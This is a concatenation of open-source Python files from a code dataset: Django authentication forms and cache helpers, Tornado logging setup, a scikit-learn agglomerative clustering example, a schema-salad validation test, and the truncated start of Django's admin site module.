        error_messages = {'invalid': _("This value may contain only letters, numbers and @/./+/-/_ characters.")})
    password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
    password2 = forms.CharField(label=_("Password confirmation"), widget=forms.PasswordInput,
        help_text = _("Enter the same password as above, for verification."))

    class Meta:
        model = User
        fields = ("username",)

    def clean_username(self):
        """
        Validate that the username is not already taken.
        """
        username = self.cleaned_data["username"]
        try:
            User.objects.get(username=username)
        except User.DoesNotExist:
            return username
        raise forms.ValidationError(_("A user with that username already exists."))

    def clean_password2(self):
        """
        Validate that the two password entries match.

        Both fields are read with .get(): a field that failed its own
        validation is absent from cleaned_data, and indexing it directly
        raised KeyError instead of producing a form error.
        """
        password1 = self.cleaned_data.get("password1")
        password2 = self.cleaned_data.get("password2")
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError(_("The two password fields didn't match."))
        return password2

    def save(self, commit=True):
        """
        Create the user with a properly hashed password.

        With commit=False the caller is responsible for saving the instance.
        """
        user = super(UserCreationForm, self).save(commit=False)
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
        return user
class UserChangeForm(forms.ModelForm):
    """
    A form for updating an existing user.
    """
    username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^[\w.@+-]+$',
        help_text = _("Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only."),
        error_messages = {'invalid': _("This value may contain only letters, numbers and @/./+/-/_ characters.")})

    class Meta:
        model = User

    def __init__(self, *args, **kwargs):
        super(UserChangeForm, self).__init__(*args, **kwargs)
        permissions_field = self.fields.get('user_permissions', None)
        if permissions_field is not None:
            # Prefetch content types to avoid one query per permission row.
            permissions_field.queryset = permissions_field.queryset.select_related('content_type')
class AuthenticationForm(forms.Form):
    """
    Base class for authenticating users. Extend this to get a form that accepts
    username/password logins.
    """
    username = forms.CharField(label=_("Username"), max_length=30)
    password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)

    def __init__(self, request=None, *args, **kwargs):
        """
        If request is passed in, the form will validate that cookies are
        enabled. Note that the request (a HttpRequest object) must have set a
        cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
        running this validation.
        """
        self.request = request
        self.user_cache = None
        super(AuthenticationForm, self).__init__(*args, **kwargs)

    def clean(self):
        username = self.cleaned_data.get('username')
        password = self.cleaned_data.get('password')

        if username and password:
            self.user_cache = authenticate(username=username, password=password)
            if self.user_cache is None:
                raise forms.ValidationError(_("Please enter a correct username and password. Note that both fields are case-sensitive."))
            if not self.user_cache.is_active:
                raise forms.ValidationError(_("This account is inactive."))

        # TODO: determine whether this should move to its own method.
        if self.request and not self.request.session.test_cookie_worked():
            raise forms.ValidationError(_("Your Web browser doesn't appear to have cookies enabled. Cookies are required for logging in."))

        return self.cleaned_data

    def get_user_id(self):
        """Return the authenticated user's id, or None."""
        return self.user_cache.id if self.user_cache else None

    def get_user(self):
        """Return the authenticated user, or None."""
        return self.user_cache
class PasswordResetForm(forms.Form):
    """Request a password-reset e-mail for every account matching an address."""

    email = forms.EmailField(label=_("E-mail"), max_length=75)

    def clean_email(self):
        """
        Validates that a user exists with the given e-mail address.
        """
        email = self.cleaned_data["email"]
        # Several accounts may share one address; keep them all for save().
        self.users_cache = User.objects.filter(email__iexact=email)
        if len(self.users_cache) == 0:
            raise forms.ValidationError(_("That e-mail address doesn't have an associated user account. Are you sure you've registered?"))
        return email

    def save(self, domain_override=None, email_template_name='registration/password_reset_email.html',
        use_https=False, token_generator=default_token_generator, request=None):
        """
        Generates a one-use only link for resetting password and sends to the user
        """
        from django.core.mail import send_mail
        # NOTE(review): inactive users and users with unusable passwords are
        # not filtered out here -- confirm whether they should receive reset
        # mail before relying on this in production.
        for user in self.users_cache:
            if not domain_override:
                current_site = get_current_site(request)
                site_name = current_site.name
                domain = current_site.domain
            else:
                site_name = domain = domain_override
            t = loader.get_template(email_template_name)
            c = {
                'email': user.email,
                'domain': domain,
                'site_name': site_name,
                # base36-encoded user id, decoded again by the confirm view.
                'uid': int_to_base36(user.id),
                'user': user,
                'token': token_generator.make_token(user),
                'protocol': use_https and 'https' or 'http',
            }
            send_mail(_("Password reset on %s") % site_name,
                t.render(Context(c)), None, [user.email])
class SetPasswordForm(forms.Form):
    """
    A form that lets a user set his/her password without entering the
    old password.
    """
    new_password1 = forms.CharField(label=_("New password"), widget=forms.PasswordInput)
    new_password2 = forms.CharField(label=_("New password confirmation"), widget=forms.PasswordInput)

    def __init__(self, user, *args, **kwargs):
        # Remember which user's password is being set.
        self.user = user
        super(SetPasswordForm, self).__init__(*args, **kwargs)

    def clean_new_password2(self):
        """Verify that both new-password entries match."""
        first = self.cleaned_data.get('new_password1')
        second = self.cleaned_data.get('new_password2')
        if first and second and first != second:
            raise forms.ValidationError(_("The two password fields didn't match."))
        return second

    def save(self, commit=True):
        """Hash and store the new password; persist the user when commit=True."""
        self.user.set_password(self.cleaned_data['new_password1'])
        if commit:
            self.user.save()
        return self.user
class PasswordChangeForm(SetPasswordForm):
    """
    A form that lets a user change his/her password by entering
    their old password.
    """
    old_password = forms.CharField(label=_("Old password"), widget=forms.PasswordInput)
    def clean_old_password(self):
        """
        Validates that the old_password field is correct.
        """
        old_password = self.cleaned_data["old_password"]
        if not self.user.check_password(old_password):
            raise forms.ValidationError(_("Your old password was entered incorrectly. Please enter it again."))
        return old_password
# Declared fields are collected in definition order, which would render
# old_password after the inherited new_password1/new_password2 fields;
# reorder so the old password is asked for first.
PasswordChangeForm.base_fields.keyOrder = ['old_password', 'new_password1', 'new_password2']
class AdminPasswordChangeForm(forms.Form):
    """
    A form used to change the password of a user in the admin interface.
    """
    password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
    password2 = forms.CharField(label=_("Password (again)"), widget=forms.PasswordInput)

    def __init__(self, user, *args, **kwargs):
        # The target user whose password will be replaced.
        self.user = user
        super(AdminPasswordChangeForm, self).__init__(*args, **kwargs)

    def clean_password2(self):
        """Ensure both password entries agree."""
        first = self.cleaned_data.get('password1')
        second = self.cleaned_data.get('password2')
        if first and second and first != second:
            raise forms.ValidationError(_("The two password fields didn't match."))
        return second

    def save(self, commit=True):
        """Hash and store the new password; persist the user when commit=True."""
        self.user.set_password(self.cleaned_data["password1"])
        if commit:
            self.user.save()
        return self.user
| gpl-3.0 |
hackerbot/DjangoDev | django/utils/cache.py | 7 | 11184 | """
This module contains helper functions for controlling caching. It does so by
managing the "Vary" header of responses. It includes functions to patch the
header of response objects directly and decorators that change functions to do
that header-patching themselves.
For information on the Vary header, see:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44
Essentially, the "Vary" HTTP header defines which headers a cache should take
into account when building its cache key. Requests with the same path but
different header content for headers named in "Vary" need to get different
cache keys to prevent delivery of wrong content.
An example: i18n middleware would need to distinguish caches by the
"Accept-language" header.
"""
from __future__ import unicode_literals
import hashlib
import re
import time
from django.conf import settings
from django.core.cache import caches
from django.utils.encoding import force_bytes, force_text, iri_to_uri
from django.utils.http import http_date
from django.utils.timezone import get_current_timezone_name
from django.utils.translation import get_language
cc_delim_re = re.compile(r'\s*,\s*')
def patch_cache_control(response, **kwargs):
    """
    Patch the Cache-Control header of ``response`` by folding in all keyword
    arguments. The transformation is as follows:

    * All keyword parameter names are turned to lowercase, and underscores
      are converted to hyphens.
    * If the value of a parameter is True (exactly True, not just a
      true value), only the parameter name is added to the header.
    * All other parameters are added with their value, after applying
      str() to it.
    """
    def parse_directive(raw):
        # "name=value" -> (name, value); a bare "name" maps to True.
        name, sep, value = raw.partition('=')
        return (name.lower(), value if sep else True)

    def serialize_directive(name, value):
        return name if value is True else '%s=%s' % (name, value)

    if response.has_header('Cache-Control'):
        directives = dict(parse_directive(part) for part in
                          re.split(r'\s*,\s*', response['Cache-Control']))
    else:
        directives = {}
    # If there's already a max-age directive but we're being asked to set a
    # new max-age, use the minimum of the two ages. In practice this happens
    # when a decorator and a piece of middleware both operate on a given view.
    if 'max-age' in directives and 'max_age' in kwargs:
        kwargs['max_age'] = min(int(directives['max-age']), kwargs['max_age'])
    # Allow overriding private caching and vice versa.
    if 'private' in directives and 'public' in kwargs:
        del directives['private']
    elif 'public' in directives and 'private' in kwargs:
        del directives['public']
    for key, value in kwargs.items():
        directives[key.replace('_', '-')] = value
    response['Cache-Control'] = ', '.join(
        serialize_directive(name, value) for name, value in directives.items())
def get_max_age(response):
    """
    Return the max-age from the response Cache-Control header as an integer
    (or ``None`` if it wasn't found or wasn't an integer).
    """
    if not response.has_header('Cache-Control'):
        return None
    # Parse the header into a {directive-name: value} dict; a bare directive
    # (no "=") maps to True, mirroring the rest of this module's parsing.
    directives = {}
    for part in re.split(r'\s*,\s*', response['Cache-Control']):
        name, sep, value = part.partition('=')
        directives[name.lower()] = value if sep else True
    if 'max-age' in directives:
        try:
            return int(directives['max-age'])
        except (ValueError, TypeError):
            # Non-numeric max-age value: treat as absent.
            return None
    return None
def _set_response_etag(response):
    """Set the ETag header to the MD5 hex digest of the response content.

    Streaming responses are left untouched since their content isn't
    available up front. Returns the response for chaining.
    """
    if not response.streaming:
        response['ETag'] = '"%s"' % hashlib.md5(response.content).hexdigest()
    return response
def patch_response_headers(response, cache_timeout=None):
    """
    Adds some useful headers to the given HttpResponse object:
    ETag, Last-Modified, Expires and Cache-Control

    Each header is only added if it isn't already set. cache_timeout is in
    seconds; the CACHE_MIDDLEWARE_SECONDS setting is used by default.
    """
    if cache_timeout is None:
        cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
    cache_timeout = max(cache_timeout, 0)  # max-age may never be negative
    if settings.USE_ETAGS and not response.has_header('ETag'):
        if callable(getattr(response, 'render', None)):
            # Template responses have no content yet; hash after rendering.
            response.add_post_render_callback(_set_response_etag)
        else:
            response = _set_response_etag(response)
    if not response.has_header('Last-Modified'):
        response['Last-Modified'] = http_date()
    if not response.has_header('Expires'):
        response['Expires'] = http_date(time.time() + cache_timeout)
    patch_cache_control(response, max_age=cache_timeout)
def add_never_cache_headers(response):
    """
    Adds headers to a response to indicate that a page should never be cached.
    """
    # cache_timeout=-1 is clamped to 0 by patch_response_headers, producing
    # an already-expired Expires header and max-age=0.
    patch_response_headers(response, cache_timeout=-1)
    # Directives that defeat both browser and intermediary caches.
    patch_cache_control(response, no_cache=True, no_store=True, must_revalidate=True)
def patch_vary_headers(response, newheaders):
    """
    Adds (or updates) the "Vary" header in the given HttpResponse object.
    newheaders is a list of header names that should be in "Vary". Existing
    headers in "Vary" aren't removed.

    If an asterisk occurs anywhere (existing header or newheaders), the
    result is simply ``Vary: *`` — per RFC 7231 section 7.1.4 an asterisk
    subsumes every other value.
    """
    # Note that we need to keep the original order intact, because cache
    # implementations may rely on the order of the Vary contents in, say,
    # computing an MD5 hash.
    if response.has_header('Vary'):
        vary_headers = re.split(r'\s*,\s*', response['Vary'])
    else:
        vary_headers = []
    # Use .lower() here so we treat headers as case-insensitive.
    existing_headers = set(header.lower() for header in vary_headers)
    additional_headers = [newheader for newheader in newheaders
                          if newheader.lower() not in existing_headers]
    vary_headers += additional_headers
    if '*' in vary_headers:
        # "Vary: *" means the response is effectively uncacheable; listing
        # anything alongside it is meaningless.
        response['Vary'] = '*'
    else:
        response['Vary'] = ', '.join(vary_headers)
def has_vary_header(response, header_query):
    """
    Checks to see if the response has a given header name in its Vary header.
    """
    if not response.has_header('Vary'):
        return False
    # Header names are case-insensitive, so compare lowercased.
    names = set(part.lower() for part in re.split(r'\s*,\s*', response['Vary']))
    return header_query.lower() in names
def _i18n_cache_key_suffix(request, cache_key):
    """If necessary, adds the current locale or time zone to the cache key.

    Returns the (possibly suffixed) key.
    """
    if settings.USE_I18N or settings.USE_L10N:
        # first check if LocaleMiddleware or another middleware added
        # LANGUAGE_CODE to request, then fall back to the active language
        # which in turn can also fall back to settings.LANGUAGE_CODE
        cache_key += '.%s' % getattr(request, 'LANGUAGE_CODE', get_language())
    if settings.USE_TZ:
        # The datetime module doesn't restrict the output of tzname().
        # Windows is known to use non-standard, locale-dependent names.
        # User-defined tzinfo classes may return absolutely anything.
        # Hence this paranoid conversion to create a valid cache key.
        tz_name = force_text(get_current_timezone_name(), errors='ignore')
        cache_key += '.%s' % tz_name.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
    return cache_key
def _generate_cache_key(request, method, headerlist, key_prefix):
    """Returns a cache key from the headers given in the header list."""
    # Hash the values of all varying request headers so the key stays short
    # no matter how many headers contribute to it.
    ctx = hashlib.md5()
    for header in headerlist:
        value = request.META.get(header, None)
        if value is not None:
            ctx.update(force_bytes(value))
    # The full absolute URI (scheme, host, path and query) identifies the page.
    url = hashlib.md5(force_bytes(iri_to_uri(request.build_absolute_uri())))
    cache_key = 'views.decorators.cache.cache_page.%s.%s.%s.%s' % (
        key_prefix, method, url.hexdigest(), ctx.hexdigest())
    return _i18n_cache_key_suffix(request, cache_key)
def _generate_cache_header_key(key_prefix, request):
    """Returns a cache key for the header cache.

    The stored value (see learn_cache_key) is the list of request headers
    the cached page varies on.
    """
    url = hashlib.md5(force_bytes(iri_to_uri(request.build_absolute_uri())))
    cache_key = 'views.decorators.cache.cache_header.%s.%s' % (
        key_prefix, url.hexdigest())
    return _i18n_cache_key_suffix(request, cache_key)
def get_cache_key(request, key_prefix=None, method='GET', cache=None):
    """
    Returns a cache key based on the request URL and query. It can be used
    in the request phase because it pulls the list of headers to take into
    account from the global URL registry and uses those to build a cache key
    to check against.

    If there is no headerlist stored, the page needs to be rebuilt, so this
    function returns None.
    """
    if key_prefix is None:
        key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
    if cache is None:
        cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
    headerlist = cache.get(_generate_cache_header_key(key_prefix, request), None)
    if headerlist is None:
        # Nothing learned for this URL yet; caller must build the response.
        return None
    return _generate_cache_key(request, method, headerlist, key_prefix)
def learn_cache_key(request, response, cache_timeout=None, key_prefix=None, cache=None):
    """
    Learns what headers to take into account for some request URL from the
    response object. It stores those headers in a global URL registry so that
    later access to that URL will know what headers to take into account
    without building the response object itself. The headers are named in the
    Vary header of the response, but we want to prevent response generation.
    The list of headers to use for cache key generation is stored in the same
    cache as the pages themselves. If the cache ages some data out of the
    cache, this just means that we have to build the response once to get at
    the Vary header and so at the list of headers to use for the cache key.
    """
    if key_prefix is None:
        key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
    if cache_timeout is None:
        cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
    cache_key = _generate_cache_header_key(key_prefix, request)
    if cache is None:
        cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
    if response.has_header('Vary'):
        is_accept_language_redundant = settings.USE_I18N or settings.USE_L10N
        # If i18n or l10n are used, the generated cache key will be suffixed
        # with the current locale. Adding the raw value of Accept-Language is
        # redundant in that case and would result in storing the same content
        # under multiple keys in the cache. See #18191 for details.
        headerlist = []
        for header in cc_delim_re.split(response['Vary']):
            # Normalize "Header-Name" to its WSGI META form "HTTP_HEADER_NAME".
            header = header.upper().replace('-', '_')
            if header == 'ACCEPT_LANGUAGE' and is_accept_language_redundant:
                continue
            headerlist.append('HTTP_' + header)
        # Sort so that logically-equal Vary headers store an identical list.
        headerlist.sort()
        cache.set(cache_key, headerlist, cache_timeout)
        return _generate_cache_key(request, request.method, headerlist, key_prefix)
    else:
        # if there is no Vary header, we still need a cache key
        # for the request.build_absolute_uri()
        cache.set(cache_key, [], cache_timeout)
        return _generate_cache_key(request, request.method, [], key_prefix)
def _to_tuple(s):
    """Split a "name=value" Cache-Control directive into (name, value);
    a bare directive yields (name, True). The name is lowercased."""
    name, sep, value = s.partition('=')
    return (name.lower(), value if sep else True)
| bsd-3-clause |
Snamint/tornado | tornado/log.py | 45 | 10920 | #!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Logging support for Tornado.
Tornado uses three logger streams:
* ``tornado.access``: Per-request logging for Tornado's HTTP servers (and
potentially other servers in the future)
* ``tornado.application``: Logging of errors from application code (i.e.
uncaught exceptions from callbacks)
* ``tornado.general``: General-purpose logging, including any errors
or warnings from Tornado itself.
These streams may be configured independently using the standard library's
`logging` module. For example, you may wish to send ``tornado.access`` logs
to a separate file for analysis.
"""
from __future__ import absolute_import, division, print_function, with_statement
import logging
import logging.handlers
import sys
from tornado.escape import _unicode
from tornado.util import unicode_type, basestring_type
try:
import curses
except ImportError:
curses = None
# Logger objects for internal tornado use
access_log = logging.getLogger("tornado.access")
app_log = logging.getLogger("tornado.application")
gen_log = logging.getLogger("tornado.general")
def _stderr_supports_color():
    """Return True if stderr is a terminal whose terminfo entry reports
    color support.

    Requires the curses module; any failure (e.g. an unknown or dumb
    terminal) disables color rather than raising.
    """
    color = False
    if curses and hasattr(sys.stderr, 'isatty') and sys.stderr.isatty():
        try:
            curses.setupterm()
            if curses.tigetnum("colors") > 0:
                color = True
        except Exception:
            pass
    return color
def _safe_unicode(s):
    """Decode ``s`` to unicode, falling back to ``repr(s)`` on invalid bytes.

    Guarantees a printable result so that logging never raises
    UnicodeDecodeError on arbitrary byte strings.
    """
    try:
        return _unicode(s)
    except UnicodeDecodeError:
        return repr(s)
class LogFormatter(logging.Formatter):
    """Log formatter used in Tornado.
    Key features of this formatter are:
    * Color support when logging to a terminal that supports it.
    * Timestamps on every log line.
    * Robust against str/bytes encoding problems.
    This formatter is enabled automatically by
    `tornado.options.parse_command_line` (unless ``--logging=none`` is
    used).
    """
    DEFAULT_FORMAT = '%(color)s[%(levelname)1.1s %(asctime)s %(module)s:%(lineno)d]%(end_color)s %(message)s'
    DEFAULT_DATE_FORMAT = '%y%m%d %H:%M:%S'
    # Mapping of logging level -> terminal color index (curses setaf/setf arg).
    DEFAULT_COLORS = {
        logging.DEBUG: 4,  # Blue
        logging.INFO: 2,  # Green
        logging.WARNING: 3,  # Yellow
        logging.ERROR: 1,  # Red
    }
    def __init__(self, color=True, fmt=DEFAULT_FORMAT,
                 datefmt=DEFAULT_DATE_FORMAT, colors=DEFAULT_COLORS):
        r"""
        :arg bool color: Enables color support.
        :arg string fmt: Log message format.
          It will be applied to the attributes dict of log records. The
          text between ``%(color)s`` and ``%(end_color)s`` will be colored
          depending on the level if color support is on.
        :arg dict colors: color mappings from logging level to terminal color
           code
        :arg string datefmt: Datetime format.
          Used for formatting ``(asctime)`` placeholder in ``prefix_fmt``.
        .. versionchanged:: 3.2
           Added ``fmt`` and ``datefmt`` arguments.
        """
        logging.Formatter.__init__(self, datefmt=datefmt)
        self._fmt = fmt
        # Level number -> ANSI escape sequence; left empty when color is off.
        self._colors = {}
        if color and _stderr_supports_color():
            # The curses module has some str/bytes confusion in
            # python3. Until version 3.2.3, most methods return
            # bytes, but only accept strings. In addition, we want to
            # output these strings with the logging module, which
            # works with unicode strings. The explicit calls to
            # unicode() below are harmless in python2 but will do the
            # right conversion in python 3.
            fg_color = (curses.tigetstr("setaf") or
                        curses.tigetstr("setf") or "")
            if (3, 0) < sys.version_info < (3, 2, 3):
                fg_color = unicode_type(fg_color, "ascii")
            for levelno, code in colors.items():
                self._colors[levelno] = unicode_type(curses.tparm(fg_color, code), "ascii")
            # Escape sequence that resets all attributes (end of colored span).
            self._normal = unicode_type(curses.tigetstr("sgr0"), "ascii")
        else:
            self._normal = ''
    def format(self, record):
        try:
            message = record.getMessage()
            assert isinstance(message, basestring_type)  # guaranteed by logging
            # Encoding notes: The logging module prefers to work with character
            # strings, but only enforces that log messages are instances of
            # basestring. In python 2, non-ascii bytestrings will make
            # their way through the logging framework until they blow up with
            # an unhelpful decoding error (with this formatter it happens
            # when we attach the prefix, but there are other opportunities for
            # exceptions further along in the framework).
            #
            # If a byte string makes it this far, convert it to unicode to
            # ensure it will make it out to the logs. Use repr() as a fallback
            # to ensure that all byte strings can be converted successfully,
            # but don't do it by default so we don't add extra quotes to ascii
            # bytestrings. This is a bit of a hacky place to do this, but
            # it's worth it since the encoding errors that would otherwise
            # result are so useless (and tornado is fond of using utf8-encoded
            # byte strings whereever possible).
            record.message = _safe_unicode(message)
        except Exception as e:
            record.message = "Bad message (%r): %r" % (e, record.__dict__)
        record.asctime = self.formatTime(record, self.datefmt)
        if record.levelno in self._colors:
            record.color = self._colors[record.levelno]
            record.end_color = self._normal
        else:
            record.color = record.end_color = ''
        formatted = self._fmt % record.__dict__
        if record.exc_info:
            if not record.exc_text:
                record.exc_text = self.formatException(record.exc_info)
        if record.exc_text:
            # exc_text contains multiple lines. We need to _safe_unicode
            # each line separately so that non-utf8 bytes don't cause
            # all the newlines to turn into '\n'.
            lines = [formatted.rstrip()]
            lines.extend(_safe_unicode(ln) for ln in record.exc_text.split('\n'))
            formatted = '\n'.join(lines)
        return formatted.replace("\n", "\n    ")
def enable_pretty_logging(options=None, logger=None):
    """Turns on formatted logging output as configured.
    This is called automatically by `tornado.options.parse_command_line`
    and `tornado.options.parse_config_file`.
    """
    if options is None:
        from tornado.options import options
    if options.logging is None or options.logging.lower() == 'none':
        return
    if logger is None:
        # Configure the root logger when none is given.
        logger = logging.getLogger()
    logger.setLevel(getattr(logging, options.logging.upper()))
    if options.log_file_prefix:
        # File logging: rotated either by size or by time interval.
        rotate_mode = options.log_rotate_mode
        if rotate_mode == 'size':
            channel = logging.handlers.RotatingFileHandler(
                filename=options.log_file_prefix,
                maxBytes=options.log_file_max_size,
                backupCount=options.log_file_num_backups)
        elif rotate_mode == 'time':
            channel = logging.handlers.TimedRotatingFileHandler(
                filename=options.log_file_prefix,
                when=options.log_rotate_when,
                interval=options.log_rotate_interval,
                backupCount=options.log_file_num_backups)
        else:
            error_message = 'The value of log_rotate_mode option should be ' +\
                            '"size" or "time", not "%s".' % rotate_mode
            raise ValueError(error_message)
        # File handlers never use color escape sequences.
        channel.setFormatter(LogFormatter(color=False))
        logger.addHandler(channel)
    if (options.log_to_stderr or
            (options.log_to_stderr is None and not logger.handlers)):
        # Set up color if we are in a tty and curses is installed
        channel = logging.StreamHandler()
        channel.setFormatter(LogFormatter())
        logger.addHandler(channel)
def define_logging_options(options=None):
    """Add logging-related flags to ``options``.
    These options are present automatically on the default options instance;
    this method is only necessary if you have created your own `.OptionParser`.
    .. versionadded:: 4.2
       This function existed in prior versions but was broken and undocumented until 4.2.
    """
    if options is None:
        # late import to prevent cycle
        from tornado.options import options
    options.define("logging", default="info",
                   help=("Set the Python log level. If 'none', tornado won't touch the "
                         "logging configuration."),
                   metavar="debug|info|warning|error|none")
    options.define("log_to_stderr", type=bool, default=None,
                   help=("Send log output to stderr (colorized if possible). "
                         "By default use stderr if --log_file_prefix is not set and "
                         "no other logging is configured."))
    options.define("log_file_prefix", type=str, default=None, metavar="PATH",
                   help=("Path prefix for log files. "
                         "Note that if you are running multiple tornado processes, "
                         "log_file_prefix must be different for each of them (e.g. "
                         "include the port number)"))
    options.define("log_file_max_size", type=int, default=100 * 1000 * 1000,
                   help="max size of log files before rollover")
    options.define("log_file_num_backups", type=int, default=10,
                   help="number of log files to keep")
    options.define("log_rotate_when", type=str, default='midnight',
                   help=("specify the type of TimedRotatingFileHandler interval "
                         "other options:('S', 'M', 'H', 'D', 'W0'-'W6')"))
    options.define("log_rotate_interval", type=int, default=1,
                   help="The interval value of timed rotating")
    options.define("log_rotate_mode", type=str, default='size',
                   help="The mode of rotating files(time or size)")
    # Re-apply the configuration whenever the options are (re)parsed.
    options.add_parse_callback(lambda: enable_pretty_logging(options))
| apache-2.0 |
xavierwu/scikit-learn | examples/cluster/plot_agglomerative_clustering.py | 343 | 2931 | """
Agglomerative clustering with and without structure
===================================================
This example shows the effect of imposing a connectivity graph to capture
local structure in the data. The graph is simply the graph of 20 nearest
neighbors.
Two consequences of imposing a connectivity can be seen. First clustering
with a connectivity matrix is much faster.
Second, when using a connectivity matrix, average and complete linkage are
unstable and tend to create a few clusters that grow very quickly. Indeed,
average and complete linkage fight this percolation behavior by considering all
the distances between two clusters when merging them. The connectivity
graph breaks this mechanism. This effect is more pronounced for very
sparse graphs (try decreasing the number of neighbors in
kneighbors_graph) and with complete linkage. In particular, having a very
small number of neighbors in the graph, imposes a geometry that is
close to that of single linkage, which is well known to have this
percolation instability.
"""
# Authors: Gael Varoquaux, Nelle Varoquaux
# License: BSD 3 clause
import time
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.neighbors import kneighbors_graph
# Generate sample data
n_samples = 1500
np.random.seed(0)
# Points along a spiral: angle t increases with the random draw and the
# radius grows with t, producing an elongated curved manifold.
t = 1.5 * np.pi * (1 + 3 * np.random.rand(1, n_samples))
x = t * np.cos(t)
y = t * np.sin(t)
X = np.concatenate((x, y))
X += .7 * np.random.randn(2, n_samples)  # add Gaussian noise
X = X.T  # shape (n_samples, 2): one row per point
# Create a graph capturing local connectivity. Larger number of neighbors
# will give more homogeneous clusters to the cost of computation
# time. A very large number of neighbors gives more evenly distributed
# cluster sizes, but may not impose the local manifold structure of
# the data
knn_graph = kneighbors_graph(X, 30, include_self=False)
# Compare each linkage with and without the connectivity constraint, at a
# fine (30 clusters) and a coarse (3 clusters) granularity.
for connectivity in (None, knn_graph):
    for n_clusters in (30, 3):
        plt.figure(figsize=(10, 4))
        for index, linkage in enumerate(('average', 'complete', 'ward')):
            plt.subplot(1, 3, index + 1)
            model = AgglomerativeClustering(linkage=linkage,
                                            connectivity=connectivity,
                                            n_clusters=n_clusters)
            t0 = time.time()
            model.fit(X)
            elapsed_time = time.time() - t0
            plt.scatter(X[:, 0], X[:, 1], c=model.labels_,
                        cmap=plt.cm.spectral)
            plt.title('linkage=%s (time %.2fs)' % (linkage, elapsed_time),
                      fontdict=dict(verticalalignment='top'))
            plt.axis('equal')
            plt.axis('off')
        plt.subplots_adjust(bottom=0, top=.89, wspace=0,
                            left=0, right=1)
        plt.suptitle('n_cluster=%i, connectivity=%r' %
                     (n_clusters, connectivity is not None), size=17)
plt.show()
| bsd-3-clause |
mr-c/common-workflow-language | v1.0/salad/schema_salad/tests/test_errors.py | 7 | 1436 | from __future__ import absolute_import
from __future__ import print_function
from .util import get_data
import unittest
from schema_salad.schema import load_schema, load_and_validate
from schema_salad.validate import ValidationException
from avro.schema import Names
import six
class TestErrors(unittest.TestCase):
    def test_errors(self):
        """Every intentionally broken document must raise ValidationException."""
        document_loader, avsc_names, schema_metadata, metaschema_loader = load_schema(
            get_data(u"tests/test_schema/CommonWorkflowLanguage.yml"))
        # test1.cwl .. test14.cwl under tests/test_schema/.
        broken_docs = ["test_schema/test%d.cwl" % i for i in range(1, 15)]
        for doc in broken_docs:
            with self.assertRaises(ValidationException):
                try:
                    load_and_validate(document_loader, avsc_names,
                                      six.text_type(get_data("tests/" + doc)), True)
                except ValidationException as e:
                    # Echo the message for easier debugging, then re-raise so
                    # assertRaises still sees the exception.
                    print("\n", e)
                    raise
| apache-2.0 |
bikong2/django | django/contrib/admin/sites.py | 120 | 21146 | from functools import update_wrapper
from django.apps import apps
from django.conf import settings
from django.contrib.admin import ModelAdmin, actions
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db.models.base import ModelBase
from django.http import Http404, HttpResponseRedirect
from django.template.engine import Engine
from django.template.response import TemplateResponse
from django.utils import six
from django.utils.text import capfirst
from django.utils.translation import ugettext as _, ugettext_lazy
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
system_check_errors = []
class AlreadyRegistered(Exception):
    """Raised by AdminSite.register() when a model is already registered."""
    pass
class NotRegistered(Exception):
    """Raised by AdminSite.unregister() when a model was never registered."""
    pass
class AdminSite(object):
    """
    An AdminSite object encapsulates an instance of the Django admin application, ready
    to be hooked in to your URLconf. Models are registered with the AdminSite using the
    register() method, and the get_urls() method can then be used to access Django view
    functions that present a full admin interface for the collection of registered
    models.
    """
    # Text to put at the end of each page's <title>.
    site_title = ugettext_lazy('Django site admin')
    # Text to put in each page's <h1>.
    site_header = ugettext_lazy('Django administration')
    # Text to put at the top of the admin index page.
    index_title = ugettext_lazy('Site administration')
    # URL for the "View site" link at the top of each admin page.
    site_url = '/'
    # Backing value for the empty_value_display property.
    _empty_value_display = '-'
    # Optional custom authentication form for the admin login view.
    login_form = None
    # Template overrides; None means the admin's bundled defaults are used.
    index_template = None
    app_index_template = None
    login_template = None
    logout_template = None
    password_change_template = None
    password_change_done_template = None
    def __init__(self, name='admin'):
        # `name` is the URL namespace for this site (e.g. 'admin:index').
        self._registry = {}  # model_class class -> admin_class instance
        self.name = name
        # Enabled actions; _global_actions keeps a copy of everything ever
        # registered so disabled actions can still be looked up.
        self._actions = {'delete_selected': actions.delete_selected}
        self._global_actions = self._actions.copy()
    def register(self, model_or_iterable, admin_class=None, **options):
        """
        Registers the given model(s) with the given admin class.
        The model(s) should be Model classes, not instances.
        If an admin class isn't given, it will use ModelAdmin (the default
        admin options). If keyword arguments are given -- e.g., list_display --
        they'll be applied as options to the admin class.
        If a model is already registered, this will raise AlreadyRegistered.
        If a model is abstract, this will raise ImproperlyConfigured.
        """
        if not admin_class:
            admin_class = ModelAdmin
        # Accept a single model class as well as an iterable of them.
        if isinstance(model_or_iterable, ModelBase):
            model_or_iterable = [model_or_iterable]
        for model in model_or_iterable:
            if model._meta.abstract:
                raise ImproperlyConfigured('The model %s is abstract, so it '
